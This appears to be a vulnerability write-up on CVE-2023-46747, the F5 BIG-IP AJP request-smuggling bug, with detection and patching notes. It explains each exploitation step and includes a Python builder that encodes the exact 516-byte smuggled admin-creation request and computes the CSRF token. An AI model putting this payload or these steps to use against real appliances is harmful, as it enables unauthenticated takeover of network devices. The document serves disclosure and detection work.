CVE-2023-46747 is a critical vulnerability in the F5 BIG-IP Configuration Utility: a request smuggling bug in its Apache JServ Protocol (AJP) handling. The flaw allows unauthenticated attackers with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. It was discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian Security and carries a CVSS score of 9.8 (critical).
The attack exploits HTTP-to-AJP request smuggling caused by Apache HTTPd and Tomcat's AJP processor disagreeing on how to handle the Content-Length and Transfer-Encoding headers. Here's a breakdown:
1. Origin of the discrepancy: Apache HTTPd receives an HTTP request carrying a `Transfer-Encoding: chunked, chunked` header, treats the body as chunked, and forwards the request to Tomcat over AJP with the header untouched. Tomcat's AJP processor only recognises a Transfer-Encoding value of exactly `chunked`, so it finds no match; it then looks for a `Content-Length` header, which is absent, and assumes a body length of 0.
2. Resulting desynchronization: Tomcat therefore considers the outer request complete, and the AJP Data packet that follows (essentially the POST body of the HTTP request) is read as the start of a new message, i.e. as a separate AJP Forward Request packet.
3. Exploiting the gap: mod_proxy_ajp prefixes each body chunk in a Data packet with its two-byte length. With a POST body of exactly 516 bytes (0x204), those two bytes are 0x02 0x04, which Tomcat reads as the message type (2 = Forward Request) followed by the method code (4 = POST); the remainder of the body is then parsed as the smuggled request's URI, headers and attributes. Because this request never passed through the authentication checks performed in front of Tomcat, it can reach /tmui/ endpoints served via the AJP port.
4. Bypassing further checks: many /tmui/* pages perform additional authentication checks. Passing them requires:
- setting the `REMOTE_USER` attribute, which can be done at the AJP level because the smuggled request is a raw Forward Request;
- supplying a `REMOTEROLE` request header with any valid integer role id.
5. Gaining full access: the goal is to find requests that fit within 516 bytes and either grant admin access or allow remote code execution. One such request creates an admin user through the BIG-IP UI via the /tmui/Control/form endpoint. It was initially too large, but removing redundant parameters brought it within the 516-byte limit.
6. Overcoming final hurdles: the user-creation action includes a CSRF check that requires the `_bufvalue` parameter to equal the base64-encoded SHA1 digest of the `Tmui-Dubbuf` header and the `_timenow` parameter concatenated together. Since the attacker controls the entire request, both values can be calculated in advance. To reach the exact 0x204-byte packet size, the `Tmui-Dubbuf` header was padded with extra "B"s; because `_bufvalue` is derived from the padded header value, the check still passes.
7. Endgame: in short, an unauthenticated attacker can create an admin user. With that account, built-in F5 functionality can be used to run Bash commands, giving code execution on the appliance.
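The steps above can be followed byte by byte with a small AJP13 encoder and parser. The block below is an added example, not code from this page, from Praetorian or from ProjectDiscovery, and it sends nothing on the network: it frames a POST body the way mod_proxy_ajp does, then parses that Data packet the way Tomcat does once it has taken the outer request's body length as 0, showing the 0x02 0x04 length prefix turning into a Forward Request for POST /tmui/Control/form with a `REMOTE_USER` attribute, a `REMOTEROLE` header and a `Tmui-Dubbuf` header padded to hit exactly 0x204 bytes. It also computes the `_bufvalue` relation so the padded header still satisfies the CSRF check. The header codes and attribute codes are those of the AJP13 protocol; the host names, the role id `0` and the `_timenow` value are constructed for illustration.

```python
import base64
import hashlib
import hmac
import struct

AJP_MAGIC = b"\x12\x34"          # magic for packets from the web server to the servlet container
JK_AJP13_FORWARD_REQUEST = 0x02  # message-type byte of a Forward Request
SC_A_REMOTE_USER = 0x03          # remote_user attribute; honoured only if tomcatAuthentication="false" or tomcatAuthorization="true"
SC_A_REQ_ATTRIBUTE, SC_A_SSL_KEY_SIZE, SC_A_ARE_DONE = 0x0A, 0x0B, 0xFF
SMUGGLED_SIZE = 0x204            # 516: the body's u16 length prefix reads back as [0x02, 0x04]

METHODS = {1: "OPTIONS", 2: "GET", 3: "HEAD", 4: "POST", 5: "PUT", 6: "DELETE", 7: "TRACE"}
ATTRS = {1: "context", 2: "servlet_path", 3: "remote_user", 4: "auth_type", 5: "query_string", 6: "jvm_route"}
HEADER_CODES = {"accept": 0xA001, "accept-charset": 0xA002, "accept-encoding": 0xA003, "accept-language": 0xA004,
                "authorization": 0xA005, "connection": 0xA006, "content-type": 0xA007, "content-length": 0xA008,
                "cookie": 0xA009, "cookie2": 0xA00A, "host": 0xA00B, "pragma": 0xA00C, "referer": 0xA00D,
                "user-agent": 0xA00E}
HEADER_NAMES = {v: k for k, v in HEADER_CODES.items()}

def ajp_string(s):
    """AJP string: u16 length, bytes, NUL terminator; 0xFFFF encodes 'no string'."""
    if s is None:
        return b"\xff\xff"
    raw = s.encode()
    return struct.pack(">H", len(raw)) + raw + b"\x00"

def data_packet(body):
    """mod_proxy_ajp frames each request-body chunk as u16 length + bytes inside a packet."""
    payload = struct.pack(">H", len(body)) + body
    return AJP_MAGIC + struct.pack(">H", len(payload)) + payload

def forward_request_tail(uri, headers, attributes):
    """Forward Request payload minus its leading [type, method] bytes (host values are constructed)."""
    out = ajp_string("HTTP/1.1") + ajp_string(uri) + ajp_string("127.0.0.1") + ajp_string(None)
    out += ajp_string("bigip.example") + struct.pack(">H", 443) + b"\x01"  # server_name, port, is_ssl
    out += struct.pack(">H", len(headers))
    for name, value in headers:                 # well-known names travel as 0xA0xx codes
        code = HEADER_CODES.get(name.lower())
        out += (struct.pack(">H", code) if code else ajp_string(name)) + ajp_string(value)
    for code, value in attributes:
        out += bytes([code]) + ajp_string(value)
    return out + bytes([SC_A_ARE_DONE])

def build_smuggled_body(uri, headers, attributes, pad_header="Tmui-Dubbuf"):
    """Pad pad_header with 'B's until the body is exactly 0x204 bytes; returns (body, pad value)."""
    pad = SMUGGLED_SIZE - len(forward_request_tail(uri, headers + [(pad_header, "")], attributes))
    if pad < 0:
        raise ValueError("request is %d bytes too large to smuggle" % -pad)
    return forward_request_tail(uri, headers + [(pad_header, "B" * pad)], attributes), "B" * pad

def parse_as_new_message(packet):
    """Tomcat's reading of a packet it believes starts a fresh request (outer body taken as empty)."""
    if packet[:2] != AJP_MAGIC or struct.unpack_from(">H", packet, 2)[0] != len(packet) - 4:
        raise ValueError("bad AJP framing")
    pos = 4

    def u8():
        nonlocal pos; pos += 1; return packet[pos - 1]

    def u16():
        nonlocal pos; pos += 2; return struct.unpack_from(">H", packet, pos - 2)[0]

    def string(n=None):
        nonlocal pos
        n = u16() if n is None else n
        if n == 0xFFFF:
            return None
        s = packet[pos:pos + n].decode(); pos += n + 1; return s

    if u8() != JK_AJP13_FORWARD_REQUEST:
        raise ValueError("not a Forward Request")
    req = {"method": METHODS[u8()], "protocol": string(), "uri": string(), "remote_addr": string(),
           "remote_host": string(), "server_name": string(), "server_port": u16(), "is_ssl": bool(u8()),
           "headers": {}, "attributes": {}}
    for _ in range(u16()):
        code = u16()                            # 0xA0xx is a coded name; otherwise it is the name length
        name = HEADER_NAMES[code] if code >> 8 == 0xA0 else string(code)
        req["headers"][name] = string()
    while (code := u8()) != SC_A_ARE_DONE:
        if code == SC_A_REQ_ATTRIBUTE:
            name = string()
            req["attributes"][name] = string()
        elif code == SC_A_SSL_KEY_SIZE:         # the one attribute whose value is a u16, not a string
            req["attributes"]["ssl_key_size"] = u16()
        else:
            req["attributes"][ATTRS.get(code, "0x%02x" % code)] = string()
    return req

def tmui_bufvalue(dubbuf, timenow):
    """_bufvalue = base64(SHA1(Tmui-Dubbuf || _timenow)), the CSRF relation the write-up describes."""
    return base64.b64encode(hashlib.sha1((dubbuf + timenow).encode()).digest()).decode()

def csrf_check_passes(dubbuf, timenow, bufvalue):
    return hmac.compare_digest(tmui_bufvalue(dubbuf, timenow), bufvalue)

if __name__ == "__main__":
    body, dubbuf = build_smuggled_body("/tmui/Control/form", [("REMOTEROLE", "0")], [(SC_A_REMOTE_USER, "admin")])
    print(parse_as_new_message(data_packet(body)))   # method POST, uri /tmui/Control/form, remote_user admin
```

Two details matter for detection engineering. First, the desync only works for a body of exactly 0x204 bytes, so a request whose body length is off by one is parsed as a different message type (a 300-byte body, for instance, yields type 0x01) and is rejected rather than smuggled; `build_smuggled_body` refuses requests that cannot be padded down to that size. Second, the `_bufvalue` check is not an anti-tampering control against this attacker: it binds the token to the padded `Tmui-Dubbuf` value, and whoever sets both the header and the parameters can always recompute it.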
The ProjectDiscovery research team compiled a template so that all Nuclei users can detect systems in their attack surface that are exploitable via CVE-2023-46747. It was developed within 5 days of the CVE notification, and just 24 hours after the public disclosure of the details of the vulnerability.
- October 26, 2023: Initial advisory and limited details for CVE-2023-46747 were published.
- October 30, 2023: The Nuclei Template was released by the ProjectDiscovery Research Team.
- October 31, 2023: Full disclosure of the vulnerability was publicly shared by Praetorian.
Patching is the strongly recommended remediation. F5 has also provided mitigation guidance for cases where patching cannot be performed immediately; review the F5 advisory (K000137353) for the recommended mitigation steps and their warnings. In particular, F5 cautions that the provided mitigation script must NOT be used on BIG-IP versions prior to 14.1.0.
- Help Net Security Article: F5 fixes critical BIG-IP vulnerability, PoC is public (CVE-2023-46747)
- Tenable Blog Post: CVE-2023-46747: Critical Authentication Bypass Vulnerability
- NVD Entry: CVE-2023-46747
- F5 Security Advisory: K000137353: BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747
- Praetorian Blog Post: The Discovery of F5 BIG-IP Vulnerability CVE-2023-46747